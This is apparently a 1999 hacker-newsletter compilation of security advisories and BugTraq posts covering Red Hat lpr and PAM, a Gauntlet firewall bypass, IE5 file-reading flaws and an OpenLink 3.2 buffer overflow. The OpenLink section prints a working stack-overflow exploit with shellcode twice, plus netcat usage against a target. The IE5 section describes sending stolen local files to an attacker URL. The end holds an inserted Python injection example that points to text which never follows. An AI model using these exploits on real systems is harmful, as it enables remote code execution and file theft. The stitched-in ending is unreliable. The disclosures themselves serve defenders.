There are potential problems with file access checking in the lpr and lpd
programs. These could allow users to print files they do not have access
to. Also, there are bugs in remote printing in the lpd that shipped with
Red Hat Linux 6.1.

2. Bug IDs fixed (http://developer.redhat.com/bugzilla for more info):

5122 5540 5697 5832 5835 5903 5949

3. Relevant releases/architectures:

Red Hat Linux 4.x, all architectures
Red Hat Linux 5.x, all architectures
Red Hat Linux 6.x, all architectures

4. Obsoleted by:

5. Conflicts with:

6. RPMs required:

Red Hat Linux 4.x:
  Intel:  ftp://ftp.redhat.com/pub/redhat/updates/4.2/i386/lpr-0.43-0.4.2.i386.rpm
  Alpha:  ftp://ftp.redhat.com/pub/redhat/updates/4.2/alpha/lpr-0.43-0.4.2.alpha.rpm
  Sparc:  ftp://ftp.redhat.com/pub/redhat/updates/4.2/sparc/lpr-0.43-0.4.2.sparc.rpm
  Source packages:
          ftp://ftp.redhat.com/pub/redhat/updates/4.2/SRPMS/lpr-0.43-0.4.2.src.rpm

Red Hat Linux 5.x:
  Intel:  ftp://ftp.redhat.com/pub/redhat/updates/5.2/i386/lpr-0.43-0.5.2.i386.rpm
  Alpha:  ftp://ftp.redhat.com/pub/redhat/updates/5.2/alpha/lpr-0.43-0.5.2.alpha.rpm
  Sparc:  ftp://ftp.redhat.com/pub/redhat/updates/5.2/sparc/lpr-0.43-0.5.2.sparc.rpm
  Source packages:
          ftp://ftp.redhat.com/pub/redhat/updates/5.2/SRPMS/lpr-0.43-0.5.2.src.rpm

Red Hat Linux 6.x:
  Intel:  ftp://ftp.redhat.com/pub/redhat/updates/6.1/i386/lpr-0.43-2.i386.rpm
  Alpha:  ftp://ftp.redhat.com/pub/redhat/updates/6.0/alpha/lpr-0.43-2.alpha.rpm
  Sparc:  ftp://ftp.redhat.com/pub/redhat/updates/6.0/sparc/lpr-0.43-2.sparc.rpm
  Source packages:
          ftp://ftp.redhat.com/pub/redhat/updates/6.1/SRPMS/lpr-0.43-2.src.rpm

7. Problem description:

There are two problems in the lpr and lpd programs.
By exploiting a race between the access check and the actual file opening,
it is potentially possible to have lpr read a file as root that the user does
not have access to. Also, the lpd program would blindly open queue files as
root; by use of the '-s' flag to lpr, it was possible to have lpd print files
that the user could not access.

Thanks go to Tymm Twillman for pointing out these vulnerabilities.

Also, various bugs in remote printing that were present in the lpd released
with Red Hat Linux 6.1 have been fixed.

8. Solution:

For each RPM for your particular architecture, run:

rpm -Uvh <filename>

where filename is the name of the RPM.

9. Verification:

MD5 sum                           Package Name
--------------------------------------------------------------------------
fb854cbddc9e38847c31aa6e07904ae6  lpr-0.43-0.4.2.i386.rpm
10d7f947c5e1e2ac13c88fec95e53838  lpr-0.43-0.4.2.alpha.rpm
aea5f8564289be2f344169ba89da5ff7  lpr-0.43-0.4.2.sparc.rpm
faaa81630ac3d5de295deec4c0cb2883  lpr-0.43-0.4.2.src.rpm
39dddd66751ae7e8e5b6fc179d61dd88  lpr-0.43-0.5.2.i386.rpm
479537d92946838857276967d6fb4e98  lpr-0.43-0.5.2.alpha.rpm
b8c3970d327b1bdd3c14b933b4dab5c0  lpr-0.43-0.5.2.sparc.rpm
3aa3386da05e96adc04db5b376f307dd  lpr-0.43-0.5.2.src.rpm
cc1f97635c0a1029febc1f0e75e40527  lpr-0.43-2.i386.rpm
9c611726e6ec6f754e0b6503f87b8e97  lpr-0.43-2.alpha.rpm
1e8ff6f9f3272f30ca96f4dcdfdc9b53  lpr-0.43-2.sparc.rpm
2c258e8aa98f5b005b326f3110410965  lpr-0.43-2.src.rpm

These packages are signed with GnuPG by Red Hat Inc. for security. Our key
is available at:

http://www.redhat.com/corp/contact.html

You can verify each package with the following command:

rpm --checksig <filename>

If you only wish to verify that each package has not been corrupted or
tampered with, examine only the md5sum with the following command:

rpm --checksig --nogpg <filename>

Note that you need RPM >= 3.0 to check GnuPG keys.

10. References:

@HWA

73.0 Gauntlet Firewall Rules Bypass Vulnerability
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

bugtraq id  721
class       Design Error
cve         GENERIC-MAP-NOMATCH
remote      Yes
local       Yes
published   October 18, 1999
updated     October 18, 1999
vulnerable  Network Associates Gauntlet Firewall 5.0

It may be possible to violate all firewall rules if certain conditions are
met when Gauntlet Firewall 5.0 is installed on the BSDI platform with a
specific configuration. The following things need to happen in the order
listed below for Gauntlet to be exploitable:

1) Install BSDI 3.1
2) Install Gauntlet 5.0
3) Install BSDI patch M310-049
4) Install Gauntlet 5.0 kernel patch level 2
5) Remove any proxy settings on client machine.
6) Set the default route on the client machine and attempt to connect to any
   host through a normal tcp connection.

This problem surfaces when connections are made through any adaptive proxy,
"old" proxy or no proxy at all. In order to exploit this, a route will need
to be specified since NAT will not occur when data is sent through the
affected firewall. None of the connections that ignore the rules are logged
in /var/log/messages.

Keith Young describes how to replicate the problem (this is taken directly
from his bugtraq post):

1) Install BSDI 3.1, March 1998. Use automatic install, however you may
   install minimal packages if you wish.
2) Mount the Gauntlet 5.0 CD-ROM. Execute /cdrom/fwinstall
3) Install Gauntlet 5.0.
4) Reboot after installation.
5) Login as root.
6) Enter "Fast GUI Setup". Fill in appropriate Interface settings for
   external and internal interfaces. If necessary, configure ESPM hosts, DNS
   settings, and admin users.
7) Quit gauntlet-admin, save changes, and rebuild.
8) After proxies have reconfigured, reboot machine.
9) Since M310-049 is required for Gauntlet kernel patch install, and
   M310-046 is required for M310-049 installation, download both from
   ftp://ftp.bsdi.com/bsdi/patches/patches-3.1/

   File info:
   M310-046    1194 Kb   Wed Oct 14 00:00:00 1998
   M310-049     116 Kb   Wed Dec 16 00:00:00 1998

   Both patches are considered "OK" by the Gauntlet support site:
   http://www.tis.com/support/bsd31.html
10) Bring machine to single-user mode by executing "kill -term 1".
11) Execute "perl5 M310-046 apply" to install BSDI libc patch.
12) Execute "perl5 M310-049 apply" to install IP DoS fix.
13) Execute "cd /sys/compile/GAUNTLET-V50/".
14) Build new kernel as required by M310-049 IP DoS kernel fix.
    # make clean
    # make depend
    # make
15) After kernel is rebuilt, reboot machine.
16) Download Gauntlet 5.0 kernel and cluster patch:
    File info:
    cluster.BSDI.patch   12623 Kb   Wed Sep 01 19:33:00 1999
    kernel.BSDI.patch      414 Kb   Wed Aug 04 17:54:00 1999
17) As noted in patch install directions, execute the following:
    # sh ./cluster.BSDI.patch
    # sh ./kernel.BSDI.patch
    # cd kernel.BSDI.patch
    # sh ./apply
    # cd ../cluster.BSDI.patch
    # sh ./apply
18) After patches are installed, reboot machine.
19) Install ESPM-GUI on client machine. Start ESPM-GUI. Add client machine
    to trusted network group. Apply changes.
20) Start web browser on client machine. Set web proxy setting to internal
    interface of firewall. Attempt to connect to external web server.
    Access is allowed. *This is correct.*
20) Remove http-gw from trusted network services. Apply changes. Attempt to
    connect to external web server. Access is denied. *This is correct.*

==Problem starts here==

21) Remove proxy setting in web browser on client machine. Set
    gateway/default route on client machine to internal interface of
    firewall. Set gateway/default route on server machine to external
    interface of firewall.
22) Clear web browser cache. Attempt to connect to external web server. Web
    page is downloaded with no logs in Gauntlet.
23) Start ESPM-GUI.
    Remove all services from trusted networks services. Remove client
    machine from ESPM network group. Apply changes.
24) FTP from client machine to server. FTP connection is made though no rule
    exists.
25) Start telnet server on client machine. Telnet from server to client.
    Telnet connection is made.

Network Associates has released a patch for this problem. Contact the vendor
for more information.

credit
  First posted to BugTraq by Keith Young on October 18, 1999.

reference
  web page: Gauntlet Firewall Unix (Network Associates Inc.)
    http://www.nai.com/asp_set/products/tns/gauntletunix_intro.asp
  message: Gauntlet 5.0 BSDI warning (Keith Young)
    http://www.securityfocus.com/templates/archive.pike?list=1&msg=380B47D4.32B1655C@v-one.com

To: BugTraq
Subject: Gauntlet 5.0 BSDI warning
Date: Mon Oct 18 1999 00:16:20
Author: Keith Young
Message-ID: <380B47D4.32B1655C@v-one.com>

Security issue in Gauntlet 5.0 BSDI when BSDI patches are installed in a
specific order
by Keith Young (kyoung@v-one.com)

-=0=--=0=--=0=--=0=--=0=--=0=--=0=--=0=--=0=-

SYSTEM AFFECTED -

Gauntlet 5.0 BSDI with latest Gauntlet patches
Other Gauntlet 5.0 patched systems are not affected
Unpatched Gauntlet 5.0 BSDI is not affected

SYNOPSIS -

Local trusted and remote non-trusted users with routes through firewall may
bypass all Gauntlet security rules. No activity will appear in the
/var/log/messages log file. Internal network scheme is exposed.

This issue will appear if you do the following in sequence:
1) Install BSDI 3.1
2) Install Gauntlet 5.0
3) Install BSDI patch M310-049
4) Install Gauntlet 5.0 kernel patch level 2

VENDOR CONTACT -

Vendor has been contacted and trouble ticket assigned. Patch will be
released soon.

OTHER NOTES -

A) Behavior occurs if connection is through any adaptive proxy (http-pdk),
   "old" proxy (http-gw) or no proxy at all (any TCP connection).
B) Packets will not be NATed by firewall, so to be 100% successful, a route
   will need to be published to get to your internal network through your
   firewall.
C) As mentioned, nothing is ever logged in /var/log/messages
D) Adding NATs to Gauntlet does not change the packets.

SOLUTIONS -

A) Install M310-049 *before* installing Gauntlet 5.0.
B) A vendor patch/fix/suggestion is coming.
C) Workaround -
   **Neither myself, V-ONE, nor NAI is responsible for the correct/incorrect
   use of this.**
   **Doing this may adversely affect your system and may void tech support.**
   (as root)
   1) # cp /usr/local/sys.gauntlet/i386/OBJ/ip_input.o /usr/src/sys/i386/OBJ
   2) # sh /usr/local/sys.gauntlet/build_kernel/build_kernel 50.1
   3) # reboot

HOW TO REPRODUCE -

Network configuration:

[client]====[firewall]====[WWW/FTP-server]
       (internal)    (external)

Client/Server: either Win98 or RedHat Linux 6.0, P2-350, 128MB RAM
Firewall: P2-350, 256MB RAM, 10GB hard drive, any BSDI-compatible NIC
All network connections done via 10baseT crossover cables, however users can
be across hubs or routers.

Listed here are the exact steps needed to reproduce this problem.

1) Install BSDI 3.1, March 1998. Use automatic install, however you may
   install minimal packages if you wish.
2) Mount the Gauntlet 5.0 CD-ROM. Execute /cdrom/fwinstall
3) Install Gauntlet 5.0.
4) Reboot after installation.
5) Login as root.
6) Enter "Fast GUI Setup". Fill in appropriate Interface settings for
   external and internal interfaces. If necessary, configure ESPM hosts, DNS
   settings, and admin users.
7) Quit gauntlet-admin, save changes, and rebuild.
8) After proxies have reconfigured, reboot machine.
9) Since M310-049 is required for Gauntlet kernel patch install, and
   M310-046 is required for M310-049 installation, download both from
   ftp://ftp.bsdi.com/bsdi/patches/patches-3.1/

   File info:
   M310-046    1194 Kb   Wed Oct 14 00:00:00 1998
   M310-049     116 Kb   Wed Dec 16 00:00:00 1998

   Both patches are considered "OK" by the Gauntlet support site:
   http://www.tis.com/support/bsd31.html
10) Bring machine to single-user mode by executing "kill -term 1".
11) Execute "perl5 M310-046 apply" to install BSDI libc patch.
12) Execute "perl5 M310-049 apply" to install IP DoS fix.
13) Execute "cd /sys/compile/GAUNTLET-V50/".
14) Build new kernel as required by M310-049 IP DoS kernel fix.
    # make clean
    # make depend
    # make
15) After kernel is rebuilt, reboot machine.
16) Download Gauntlet 5.0 kernel and cluster patch:
    File info:
    cluster.BSDI.patch   12623 Kb   Wed Sep 01 19:33:00 1999
    kernel.BSDI.patch      414 Kb   Wed Aug 04 17:54:00 1999
17) As noted in patch install directions, execute the following:
    # sh ./cluster.BSDI.patch
    # sh ./kernel.BSDI.patch
    # cd kernel.BSDI.patch
    # sh ./apply
    # cd ../cluster.BSDI.patch
    # sh ./apply
18) After patches are installed, reboot machine.
19) Install ESPM-GUI on client machine. Start ESPM-GUI. Add client machine
    to trusted network group. Apply changes.
20) Start web browser on client machine. Set web proxy setting to internal
    interface of firewall. Attempt to connect to external web server.
    Access is allowed. *This is correct.*
20) Remove http-gw from trusted network services. Apply changes. Attempt to
    connect to external web server. Access is denied. *This is correct.*

==Problem starts here==

21) Remove proxy setting in web browser on client machine. Set
    gateway/default route on client machine to internal interface of
    firewall. Set gateway/default route on server machine to external
    interface of firewall.
22) Clear web browser cache. Attempt to connect to external web server. Web
    page is downloaded with no logs in Gauntlet.
23) Start ESPM-GUI.
    Remove all services from trusted networks services. Remove client
    machine from ESPM network group. Apply changes.
24) FTP from client machine to server. FTP connection is made though no rule
    exists.
25) Start telnet server on client machine. Telnet from server to client.
    Telnet connection is made.

@HWA

74.0 Microsoft IE5 Javascript URL Redirection Vulnerability
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

bugtraq id  722
class       Design Error
cve         GENERIC-MAP-NOMATCH
remote      Yes
local       Unknown
published   October 18, 1999
updated     October 18, 1999
vulnerable  Microsoft Internet Explorer 5.0 for Windows NT 4.0
              + Microsoft Windows NT 4.0
            Microsoft Internet Explorer 5.0 for Windows 98
              + Microsoft Windows 98
            Microsoft Internet Explorer 5.0 for Windows 95
              + Microsoft Windows 95
            Microsoft Internet Explorer 5.0 for Windows 2000
              - Microsoft Windows NT 2000.0
            Microsoft Internet Explorer 4.0.1 for Windows NT 4.0
              - Microsoft Windows NT 4.0
            Microsoft Internet Explorer 4.0.1 for Windows 98
              - Microsoft Windows 98
            Microsoft Internet Explorer 4.0.1 for Windows 95
              - Microsoft Windows 95

A malicious web site operator could design a web page that, when visited by
an IE5 user, would read a local file from the victim host (or any file on
the victim's network to which the victim has access) and send the contents
of that file to a designated remote location.

1) In the instance noted above, the IE5 user visits a malicious web site.
2) The web site instructs the client to open another IE5 browser window and
   display the contents of a file residing on the IE5 user's host (or
   another host on the network to which the IE5 user has access).
3) Immediately after opening the new browser window, the window is
   instructed to browse to a specified web site, ie:
   http://malicious server.com/hack.cgi?doit.
4) The hack.cgi?doit page does not return a web page, but instead redirects
   the window to a javascript URL containing embedded executable code.
5) The javascript code (from step 4) can now access any files on the
   victim's host (or any file on the victim's network to which the victim
   has access) and send it to a location maintained by the malicious web
   site operator.

Under normal circumstances, javascript received from a non-local "security
zone" is not allowed to perform such actions against files on the local
host. In this instance, however, the IE5 browser has been fooled (via HTTP
redirect to javascript) into thinking that the Javascript should execute
under the security context of the local host's security zone, as the
javascript was requested from a browser displaying the local file.

Microsoft has released a FAQ that contains a good description of this
vulnerability:

http://www.microsoft.com/security/bulletins/MS99-043faq.asp

From Georgi's Bugtraq post:

// "http://www.nat.bg/~joro/reject.cgi?jsredir1" just does a HTTP redirect
// to: "javascript:alert(document.body.innerText)"

A demonstration of this exploit is available at:

http://www.nat.bg/~joro/jsredir1.html

credit
  This vulnerability was posted to Bugtraq by Georgi Guninski on October 18,
  1999.
reference
  advisory: MS99-043: Workaround Available for "Javascript Redirect"
    Vulnerability (MS)
    http://www.securityfocus.com/templates/advisory.html?id=1793
  message: IE 5.0 allows reading local (and from any domain) files and
    window spoofing usin (Georgi Guninski)
    http://www.securityfocus.com/templates/archive.pike?list=1&msg=380B199A.3765A0D4@nat.bg
  web page: HTTP redirection to "javascript:" (Georgi Guninski)
    http://www.nat.bg/~joro/jsredir1.html
  web page: Microsoft Security Bulletin MS99-043: Frequently Asked Questions
    (Microsoft)
    http://www.securityfocus.com/vdb/Microsoft Security Bulletin MS99-043: Frequently Asked Questions

To: BugTraq
Subject: IE 5.0 allows reading local (and from any domain) files and window
         spoofing using HTTP redirection to "javascript:"
Date: Mon Oct 18 1999 10:59:06
Author: Georgi Guninski
Message-ID: <380B199A.3765A0D4@nat.bg>

IE 5.0 allows reading local (and from any domain) files and window spoofing
using HTTP redirection to "javascript:"

Disclaimer:
The opinions expressed in this advisory and program are my own and not of
any company. The usual standard disclaimer applies, especially the fact that
Georgi Guninski is not liable for any damages caused by direct or indirect
use of the information or functionality provided by this program. Georgi
Guninski bears NO responsibility for content or misuse of this program or
any derivatives thereof.

Description:
Internet Explorer 5.0 under Windows 95 and WinNT 4.0 (suppose Win98 is
vulnerable) allows reading local files and text/HTML files from any domain.
Window spoofing is possible. It is also possible in some cases to read files
behind firewall.

Details:
The problem is a HTTP redirect to "javascript:" URLs. If you open a local
file and then change its location to an URL that redirects to
"javascript:JavaScript code" then the JavaScript code is executed in the
security context of the original local file and has access to its DOM. The
local file may be sent to an arbitrary server.
In a similar way one may do window spoofing.

This vulnerability may be exploited using HTML email message or a newsgroup
posting.

The code is:
----------------------------------------------------------------------------------------
// "http://www.nat.bg/~joro/reject.cgi?jsredir1" just does a HTTP redirect
// to: "javascript:alert(document.body.innerText)"
----------------------------------------------------------------------------------------

Workaround: Disable Active Scripting

Demonstration is available at http://www.nat.bg/~joro/jsredir1.html

Copyright 1999 Georgi Guninski

Regards,
Georgi Guninski
http://www.nat.bg/~joro

@HWA

75.0 OpenLink 3.2 Remote Buffer Overflow Vulnerability
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

bugtraq id  720
class       Boundary Condition Error
cve         GENERIC-MAP-NOMATCH
remote      Yes
local       No
published   October 15, 1999
updated     October 18, 1999
vulnerable  OpenLink Software OpenLink 3.2

Both the Unix and WindowsNT versions of OpenLink 3.2 are vulnerable to a
remotely exploitable buffer overflow attack. The problem is in their web
configuration utility, and is the result of an unchecked strcpy() call. The
consequence is the execution of arbitrary code on the target host (running
the configuration utility) with the privileges of the web software.

Exploit:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/*
 * Exploit for Openlink's web configurator for Linux/glibc2
 * use: pipe through netcat to openlink web port (8000 default)
 * ex: ./oplwall 0xbffffb85 | nc machine.to.hit 8000
 * makes www_sv execute /usr/bin/wall if you hit the address right
 *
 * For informational purposes only. This was written to show that
 * there's a problem, not for skr1pt k1dd33z --.
 * don't ask me for help on how to use this to crack systems,
 * help compiling or anything else. It will only compile on
 * an x86 compiler however.
 *
 * Addresses that work for me: 0xbffffb65 (initial run of the broker)
 *                             0xbffffb85 (all consecutive attempts)
 *                             probably tied to process ID www_sv runs as;
 *                             first try PIDs were in triple digits, others
 *                             4 digit PIDs.
 *
 * If this works, generally no more www_sv processes will be run as a side effect.
 */

void test()
{
    __asm__("
        jmp doit
exploit:
        # code basically from Aleph One's smash stacking article, with
        # minor mods
        popl %esi
        movb $0xd0, %al         # Get a / character into %al
        xorb $0xff, %al
        movb %al, 0x1(%esi)     # drop /s into place
        movb %al, 0x5(%esi)
        movb %al, 0x9(%esi)
        xorl %eax,%eax          # clear %eax
        movb %eax,0xe(%esi)     # drop a 0 at end of string
        movl %eax,0x13(%esi)    # drop NULL for environment
        leal 0x13(%esi),%edx    # point %edx to environment
        movl %esi,0xf(%esi)     # drop pointer to argv
        leal 0xf(%esi),%ecx     # point %ecx to argv
        movl %esi,%ebx          # point ebx to command - 1
        inc %ebx                # fix it to point to the right place
        movb $0xb,%al           # index to execve syscall
        int $0x80               # execute it
        xorl %ebx,%ebx          # if exec failed, exit nicely...
        movl %ebx,%eax
        inc %eax
        int $0x80
doit:
        call exploit
        .string \"..usr.bin.wall.\"
    ");
}

char *shellcode = ((char *)test) + 3;
char code[1000];

int main(int argc, char *argv[])
{
    int i;
    int left;
    unsigned char where[] = {"\0\0\0\0\0"} ;
    int *here;
    char *dummy;
    long addr;

    if (argc > 1)
        addr = strtoul(argv[1], &dummy, 0);
    else
        addr = 0xbffffb85;

    fprintf(stderr, "Setting address to %8x\n", addr);

    *((long *)where) = addr;

    strcpy(code, shellcode);
    for (i = 0; i < 64; i++) {
        strcat(code, where);
    }
    printf("GET %s\n", code);
    exit(0);
}

Tymm Twillman suggested the following workaround in his post to BugTraq
(linked to in the references section):

Disable the www_sv application in oplrqb.ini. By default there is a section
labeled Persistent Services, with the line "Configurator = www_sv". This
section, along with the entire www_sv section, should be commented out with
semicolons, e.g.
;[Persistent Services]
;Configurator = www_sv

;[www_sv]
;Program = w3config/www_sv
;Directory = w3config
;CommandLine =
;Environment = WWW_SV

;[Environment WWW_SV]

OpenLink has been notified of this problem and is working on a fix.

credit
  First posted to BugTraq by Tymm Twillman on Oct 15, 1999.

reference
  web page: OpenLink Homepage (OpenLink Software)
    http://www.openlinksw.com
  message: OpenLink 3.2 Advisory (Tymm Twillman)
    http://www.securityfocus.com/templates/archive.pike?list=1&msg=Pine.SGI.4.05.9910151747150.644081-100000@tiger.coe.missouri.edu

To: BugTraq
Subject: OpenLink 3.2 Advisory
Date: Fri Oct 15 1999 05:37:36
Author: Tymm Twillman
Message-ID:

Hmm. I wonder if I should start numbering these things now. 8)

Overview:

A serious security hole has been found in the web configuration utility
that comes with OpenLink 3.2. This hole will allow remote users to execute
arbitrary code as the user id under which the web configurator is run
(inherited from the request broker, oplrqb). The hole is a run-of-the-mill
buffer overflow, due to lack of parameter checking when strcpy() is used.

Background:

OpenLink is a database request broker, used for a generic interface to
different database vendors' products. By default, a web configuration
utility is installed, which runs at port 8000. For more information, see
OpenLink Software's web site at http://www.openlinksw.com.

Exploit:

This exploit has been coded to be benign, and is just for illustration of
the hole in the configuration utility. Furthermore, it has not been coded
for portability (no promises that it will function if compiled with anything
other than egcs-2.91.66, and it will not compile on a non-x86 compiler).

This works against the linux glibc version of OpenLink 3.2's configurator.
It can easily be modified for other purposes, however, and I have reason to
believe that the majority, if not all, platforms are vulnerable to such an
attack.
A stack address may be specified on the command line (I've had luck with
0xbffffb65, 0xbffffb85 or 0xbffffbe5). Output of this should be piped
through netcat, e.g.

./oplwall 0xbffffb85 | nc machine.to.hit 8000

--- cut ---
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/*
 * Exploit for Openlink's web configurator for Linux/glibc2
 * use: pipe through netcat to openlink web port (8000 default)
 * ex: ./oplwall 0xbffffb85 | nc machine.to.hit 8000
 * makes www_sv execute /usr/bin/wall if you hit the address right
 *
 * For informational purposes only. This was written to show that
 * there's a problem, not for skr1pt k1dd33z --.
 * don't ask me for help on how to use this to crack systems,
 * help compiling or anything else. It will only compile on
 * an x86 compiler however.
 *
 * Addresses that work for me: 0xbffffb65 (initial run of the broker)
 *                             0xbffffb85 (all consecutive attempts)
 *                             probably tied to process ID www_sv runs as;
 *                             first try PIDs were in triple digits, others
 *                             4 digit PIDs.
 *
 * If this works, generally no more www_sv processes will be run as a side effect.
 */

void test()
{
    __asm__("
        jmp doit
exploit:
        # code basically from Aleph One's smash stacking article, with
        # minor mods
        popl %esi
        movb $0xd0, %al         # Get a / character into %al
        xorb $0xff, %al
        movb %al, 0x1(%esi)     # drop /s into place
        movb %al, 0x5(%esi)
        movb %al, 0x9(%esi)
        xorl %eax,%eax          # clear %eax
        movb %eax,0xe(%esi)     # drop a 0 at end of string
        movl %eax,0x13(%esi)    # drop NULL for environment
        leal 0x13(%esi),%edx    # point %edx to environment
        movl %esi,0xf(%esi)     # drop pointer to argv
        leal 0xf(%esi),%ecx     # point %ecx to argv
        movl %esi,%ebx          # point ebx to command - 1
        inc %ebx                # fix it to point to the right place
        movb $0xb,%al           # index to execve syscall
        int $0x80               # execute it
        xorl %ebx,%ebx          # if exec failed, exit nicely...
        movl %ebx,%eax
        inc %eax
        int $0x80
doit:
        call exploit
        .string \"..usr.bin.wall.\"
    ");
}

char *shellcode = ((char *)test) + 3;
char code[1000];

int main(int argc, char *argv[])
{
    int i;
    int left;
    unsigned char where[] = {"\0\0\0\0\0"} ;
    int *here;
    char *dummy;
    long addr;

    if (argc > 1)
        addr = strtoul(argv[1], &dummy, 0);
    else
        addr = 0xbffffb85;

    fprintf(stderr, "Setting address to %8x\n", addr);

    *((long *)where) = addr;

    strcpy(code, shellcode);
    for (i = 0; i < 64; i++) {
        strcat(code, where);
    }
    printf("GET %s\n", code);
    exit(0);
}
--- cut ---

Workaround:

Disable the www_sv application in oplrqb.ini. By default there is a section
labeled Persistent Services, with the line "Configurator = www_sv". This
section, along with the entire www_sv section, should be commented out with
semicolons, e.g.

;[Persistent Services]
;Configurator = www_sv

;[www_sv]
;Program = w3config/www_sv
;Directory = w3config
;CommandLine =
;Environment = WWW_SV

;[Environment WWW_SV]

Discussion:

OpenLink software has been notified of the problem and is apparently
working on a solution. I have serious concerns that the package may be
prone to other attacks, but have no confirmation of this (other than basic
DOS attacks). My suggestion is to definitely make sure any machine running
the OpenLink broker is well protected behind a firewall, and it should not
allow logins from untrusted persons.

Kudos to:

Aleph One, for his long-lived stack smashing article, and this whole
BugTraq thing.
Hobbit, of course, for netcat.
-Tymm

@HWA

76.0 RedHat PAM NIS Locked Accounts Vulnerability
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

bugtraq id      697
class           Access Validation Error
cve             GENERIC-MAP-NOMATCH
remote          No
local           Yes
published       October 13, 1999
updated         October 13, 1999
vulnerable      RedHat Linux 6.1
not vulnerable  RedHat Linux 6.0.0
                RedHat Linux 5.2.0
                RedHat Linux 5.1.0
                RedHat Linux 5.0.0

Under some network configurations it may be possible to access locked NIS
accounts due to a vulnerability in the PAM authentication modules shipped with
RedHat version 6.1. This can lead to a local compromise where the password is
known for a locked account. RedHat 6.1 for Intel platforms is the only
vulnerable version.

The patched versions (binary and source) are available at the locations below:

ftp://updates.redhat.com/6.1/i386/pam-0.68-8.i386.rpm
ftp://updates.redhat.com/6.1/SRPMS/pam-0.68-8.src.rpm

credit
Exposed in RedHat advisory "RHSA-1999:040: New PAM packages available",
published on Oct 13, 1999.

reference
advisory: RHSA-1999:040: New PAM packages available (RedHat)
http://www.securityfocus.com/templates/advisory.html?id=1789
web page: Updates, Fixes, and Errata Page (RedHat)
http://www.redhat.com/corp/support/errata/index.html

RHSA-1999:040: New PAM packages available
Published: Wed Oct 13 1999
Updated:   Wed Oct 13 1999

1. Topic:

Under some network configurations PAM (Pluggable Authentication Modules) will
fail to lock access to disabled NIS accounts.

2. Problem description:

The PAM packages shipped with Red Hat Linux 6.1/Intel may allow access to
locked NIS accounts on certain network configurations. If you have a Red Hat
Linux 6.1 workstation performing authentication against a NIS server then you
are at risk. Red Hat recommends that you upgrade the PAM packages on all Red
Hat Linux 6.1 workstations to the versions announced in this advisory.
Previous versions of Red Hat Linux are not affected by this problem.

3. Bug IDs fixed (http://developer.redhat.com/bugzilla for more info):

4. Relevant releases/architectures:

Red Hat Linux 6.1 for i386

5. Obsoleted by: N/A

6. Conflicts with: N/A

7. RPMs required:

ftp://updates.redhat.com/6.1/i386/pam-0.68-8.i386.rpm
ftp://updates.redhat.com/6.1/SRPMS/pam-0.68-8.src.rpm

8. Solution:

For each RPM for your particular architecture, run:

rpm -Uvh <filename>

where filename is the name of the RPM.

9. Verification:

MD5 sum                           Package Name
9fd42c57d02ac039093b6f94132eee0e  SRPMS/pam-0.68-8.src.rpm
e8d5b9edf5dc9998ee19d91b7620f2ad  i386/pam-0.68-8.i386.rpm

These packages are GPG signed by Red Hat Inc. for security. Our key is
available at:

http://www.redhat.com/corp/contact.html

You can verify each package with the following command:

rpm --checksig <filename>

If you only wish to verify that each package has not been corrupted or
tampered with, examine only the md5sum with the following command:

rpm --checksig --nogpg <filename>

(Note that the embedded md5sum only catches accidental corruption: a
substituted package carries its own matching md5sum, so only the GPG
signature check detects tampering.)

10. References:

Cristian

@HWA

77.0 Microsoft IE5 IFRAME Vulnerability
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

bugtraq id      696
class           Access Validation Error
cve             GENERIC-MAP-NOMATCH
remote          Yes
local           No
published       October 11, 1999
updated         October 15, 1999
vulnerable      Microsoft Internet Explorer 5.0 for Windows NT 4.0
                Microsoft Internet Explorer 5.0 for Windows 98
                Microsoft Internet Explorer 5.0 for Windows 95
                Microsoft Internet Explorer 5.0 for Windows 2000
                Microsoft Internet Explorer 4.0.1 for Windows NT 4.0
                Microsoft Internet Explorer 4.0.1 for Windows 98
                Microsoft Internet Explorer 4.0.1 for Windows 95

Internet Explorer 5 will allow a malicious web page to read the contents of
local files through a weakness in the IE5 security model. Normally the
document.execCommand method is restricted from reading and returning data on
the local machine; however, if the method is called from within an IFRAME this
restriction can be circumvented.
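The execCommand weakness comes down to one injection primitive, which Guninski's own details (quoted further down) describe: the ID that InsertParagraph writes into the new paragraph is not escaped, so a double quote in it closes the ID attribute and whatever follows is parsed as a further attribute, in his case a STYLE whose value is an expression() that runs script. The following Python is an added example, not code from the original page or from Guninski's demonstration; the paragraph serializer, the attribute parser and the JSCode placeholder are constructed stand-ins for what IE5 did internally, not its real code. It puts the unescaped serializer beside an escaped one and checks which attributes a parser actually sees:

```python
# Added example (not from the original page or from Georgi Guninski's
# demonstration): the attribute-breakout primitive behind the IE5 IFRAME
# execCommand bug, modelled as plain string handling so it runs outside a
# browser. The serializer, the parser and "JSCode" are constructed stand-ins.
import html
import re

# Matches name="value" pairs inside a start tag (constructed; sufficient for
# the double-quoted, well-formed tags this example produces).
_ATTR_RE = re.compile(r'([A-Za-z-]+)="([^"]*)"')


def naive_paragraph(para_id: str) -> str:
    """Serialize <P ID="..."> writing the ID straight in (the weak form)."""
    return '<P ID="%s"></P>' % para_id


def escaped_paragraph(para_id: str) -> str:
    """Same element, but the ID is escaped as attribute text (the fixed form)."""
    return '<P ID="%s"></P>' % html.escape(para_id, quote=True)


def start_tag_attributes(markup: str) -> dict:
    """Attributes of the first start tag, as {lowercase name: value}."""
    tag = markup[: markup.index(">") + 1]
    return {name.lower(): value for name, value in _ATTR_RE.findall(tag)}


# Constructed ID of the shape the advisory describes: a quote closes the ID
# attribute early and a STYLE attribute with an expression() follows it.
INJECTED_ID = 'x" STYLE="left:expression(eval(JSCode))'


def smuggled_attributes(para_id: str) -> set:
    """Attribute names other than ID that the weak serializer lets through."""
    return set(start_tag_attributes(naive_paragraph(para_id))) - {"id"}


def escaped_attributes(para_id: str) -> set:
    """Same check against the escaping serializer; should always be empty."""
    return set(start_tag_attributes(escaped_paragraph(para_id))) - {"id"}


if __name__ == "__main__":
    print(naive_paragraph(INJECTED_ID))    # STYLE attribute appears
    print(escaped_paragraph(INJECTED_ID))  # stays inside the ID value
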